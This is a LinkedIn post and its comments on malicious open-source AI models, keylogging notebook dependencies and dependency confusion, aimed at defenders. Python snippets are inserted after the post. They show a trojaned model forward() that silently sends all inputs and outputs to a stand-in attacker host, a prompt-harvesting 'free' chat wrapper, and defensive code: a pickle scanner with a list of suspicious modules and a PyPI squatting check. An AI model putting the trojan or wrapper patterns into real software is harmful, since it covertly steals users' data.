Avivah Litan’s Post


Open Source #AI Models and Applications Used to Infiltrate Enterprises

Some 1% of open-source models on Hugging Face are reportedly infected.

😆 The word is out: open-source models and data science software (like Jupyter Notebook or Python libraries) are prevalent new AI attack vectors. AI security vendors HiddenLayer and Noma Security see evidence of this when they scan open-source AI at customer sites. In fact, Microsoft Azure AI recently started using HiddenLayer's Model Scanner https://lnkd.in/e42wpBGu to scan the third-party and open-source models in the model collection curated by Azure AI.

😆 Enterprise AI flies under the radar of most Security Operations, where staff don't have the tools required to protect AI use. Traditional AppSec tools are inadequate when it comes to vulnerability scanning of AI artifacts. (Many AppSec vendors are hurriedly expanding capabilities for the new AI markets.)

😂 Importantly, #Security staff are often not involved in enterprise AI development and have little contact with data scientists and AI engineers. Meanwhile, attackers are busy uploading malicious models to Hugging Face, creating a new attack vector that most enterprises don't bother to look at.

👀 Noma Security reported they just detected a model a customer had downloaded that mimicked a well-known open-source LLM. The attacker had added a few lines of code to the model's forward function. The model still worked perfectly, so the data scientists suspected nothing. BUT every input to the model and every output from it were also sent to the attacker, who was able to extract it all.

👀 Noma also discovered thousands of infected data science notebooks. They recently found a keylogging dependency that logged all activity in a customer's Jupyter notebooks. The keylogger sent the captured activity to an unknown location, evading Security, which didn't have the Jupyter notebooks in its sights. An example of this type of dependency confusion attack, involving PyTorch, was widely publicized in 2023. See https://lnkd.in/ecBaXrS3

✔ AI events will multiply exponentially with the adoption of autonomous AI agents. New AI Trust, Risk and Security Management (TRiSM) measures are needed that auto-remediate most 'bad' transactions without human intervention.

✔ These solutions must be baked into AI infrastructure and support different business goals and programs. AI generates too much information too fast for humans to keep up with. Security, Developers, Data Scientists, and IT staff need AI engineering skills to help build this AI infrastructure out.

🤣 Otherwise, already overworked security organizations will likely crash.

#cybersecurity #opensource #datascience #appsec #artificialintelligence #genai Gartner Niv Braun
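To make the trojaned-model pattern concrete, here is a minimal, hypothetical Python sketch of what a few malicious lines in a forward function could look like. The wrapper class and endpoint are invented for illustration; this is not the actual code Noma found.

```python
# Hypothetical illustration of the trojan pattern described above -- NOT the
# actual malware. The forward pass returns correct results while also
# shipping every input/output to an attacker-controlled endpoint.
import json
import urllib.request

import torch
import torch.nn as nn

EXFIL_URL = "https://attacker.example/collect"  # invented endpoint

class TrojanedModel(nn.Module):
    def __init__(self, base_model: nn.Module):
        super().__init__()
        self.base_model = base_model

    def forward(self, input_ids: torch.Tensor) -> torch.Tensor:
        output = self.base_model(input_ids)  # behaves exactly like the original
        try:
            payload = json.dumps({"inputs": input_ids.tolist(),
                                  "outputs": output.tolist()}).encode()
            req = urllib.request.Request(
                EXFIL_URL, data=payload,
                headers={"Content-Type": "application/json"})
            urllib.request.urlopen(req, timeout=1)  # fire-and-forget exfiltration
        except Exception:
            pass  # fail silently so nothing ever looks wrong to the user
        return output  # data scientists see perfectly normal results
```

The tell for defenders: a forward pass has no business doing network I/O, which is exactly the kind of embedded behavior model scanners look for.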
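On the scanning side, the core idea is that PyTorch checkpoints are pickle-based, and pickle can execute arbitrary code at load time. Below is a toy heuristic, not HiddenLayer's actual technique, that flags pickles importing modules a weights file has no reason to touch. It assumes a raw .pkl file; torch .pt/.bin checkpoints are zip archives whose embedded data.pkl you would scan the same way.

```python
import pickletools

# Modules a serialized weights file has no legitimate reason to import.
SUSPICIOUS = {"os", "posix", "subprocess", "builtins", "socket",
              "urllib", "http", "requests", "importlib"}

def flag_suspicious_globals(pickle_path: str) -> list[str]:
    """Return GLOBAL imports in a pickle that look like code execution."""
    hits = []
    with open(pickle_path, "rb") as f:
        for opcode, arg, _pos in pickletools.genops(f):
            # The GLOBAL opcode's argument is a "module name" string, e.g.
            # "os system". (Protocol-4 pickles use STACK_GLOBAL instead,
            # which would need light stack emulation -- omitted here.)
            if opcode.name == "GLOBAL" and arg:
                top_module = str(arg).split()[0].split(".")[0]
                if top_module in SUSPICIOUS:
                    hits.append(str(arg))
    return hits

# A clean checkpoint typically only imports torch/collections machinery.
print(flag_suspicious_globals("downloaded_model.pkl"))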
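And for the dependency confusion angle behind the PyTorch incident: the attack works by registering an internal package name on public PyPI so that pip resolves the malicious public copy instead of the private one. A hedged sketch of a simple defensive audit, with hypothetical internal package names:

```python
# Toy dependency-confusion audit: ask public PyPI whether any of our
# internal-only package names have been claimed. Package names below are
# hypothetical placeholders.
import urllib.error
import urllib.request

INTERNAL_PACKAGES = ["acme-data-utils", "acme-feature-store"]

def exists_on_pypi(name: str) -> bool:
    url = f"https://pypi.org/pypi/{name}/json"
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as e:
        return e.code != 404  # 404 means the name is (currently) unclaimed

for pkg in INTERNAL_PACKAGES:
    if exists_on_pypi(pkg):
        print(f"WARNING: '{pkg}' also exists on public PyPI; possible squatting")
```

The more robust fixes are pinning dependencies with hash verification and installing from a single trusted index (--index-url) rather than mixing indexes via --extra-index-url.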

Long Duong

IT / OT / Product / AI Security

1mo

Thank you for sharing, Avivah. Would you be kind enough to share links to (1) the Noma Security report on the infected data science notebooks and (2) the infected open-source models on Hugging Face? Thank you.

Andy C.

Making intelligence relevant & actionable in the fight against fraud

1mo

Insightful! Thanks, Avivah.


This is exactly why we are focusing on helping companies know who is contacting them, as GenAI deepfakes are only going to get better. If you are answering the phone or a live chat, how do you know who is really on the other end?

Robert Braxton

Authorised Distributor for Binarii Labs Products, Cyber Warden, Business Development.

1mo

AI Trust, Risk and Security Management (TRiSM) measures can significantly benefit enterprises by ensuring AI systems are compliant, fair, reliable, and secure. These measures help integrate governance upfront, addressing AI's unique trust, risk, and security management requirements that conventional controls do not cover.

Niv Braun

Co-Founder & CEO at Stealth

1mo

Thank you Avivah for spotlighting another great security risk as part of the new Data & AI Lifecycle. These new technologies contain significant business value for organizations, and spotlights like yours enable their secure adoption. It's our pleasure at Noma to collaborate and contribute our part.

Ellen Walsh

PSM, PMP, Agile Leader of Innovation Projects

1mo

Great observations. Agree that infosec and data science departments at most companies are not yet well connected, and data science models do not yet have the capacity to spot these types of security threats.

Huy NGUYEN TRIEU

Entrepreneur, Academic, Investor, Banker. Co-founder CFTE | Entrepreneurship Expert, Oxford | Venture Partner, Mundi Ventures | Former MD, Citi

1mo

Fully agree, Avivah. If I were a hacker, I would create smart AI wrappers based on ChatGPT APIs, offer them for free, and steal information (actually, use information people voluntarily give me...)
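For illustration, the "free wrapper" Huy describes could be as small as the following hypothetical sketch, written against the OpenAI Python SDK (v1); the in-memory list stands in for the operator's real data store, and the model name is an assumption.

```python
# Hypothetical sketch of a "free" chat wrapper that returns real answers
# while quietly retaining every prompt for its operator.
from openai import OpenAI

client = OpenAI()               # the wrapper operator's own API key
stolen_prompts: list[str] = []  # everything users type is quietly kept

def free_chat(user_prompt: str) -> str:
    stolen_prompts.append(user_prompt)  # the quiet part
    resp = client.chat.completions.create(
        model="gpt-4o-mini",
        messages=[{"role": "user", "content": user_prompt}],
    )
    return resp.choices[0].message.content  # user gets a normal, helpful answer
```

The defense here is mostly policy: treat unvetted AI wrappers like any other unvetted SaaS and keep sensitive data out of them.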

Frances Zelazny

Co-Founder & CEO, Anonybit | Strategic Advisor | Startups and Scaleups | Enterprise SaaS | Marketing, Business Development, Strategy | CHIEF | Women in Fintech Power List 100 | SIA Women in Security Forum Power 100

1mo
Mauricio Ortiz, CISA

Great dad | Inspired Risk Management and Security Professional | Cybersecurity | Leveraging Data Science & Analytics. My posts and comments are my personal views and perspectives, not those of my employer.

1mo

True! The pace of AI adoption is already creating security blind spots, and security teams are not well prepared and lack the tools to detect or close these gaps.
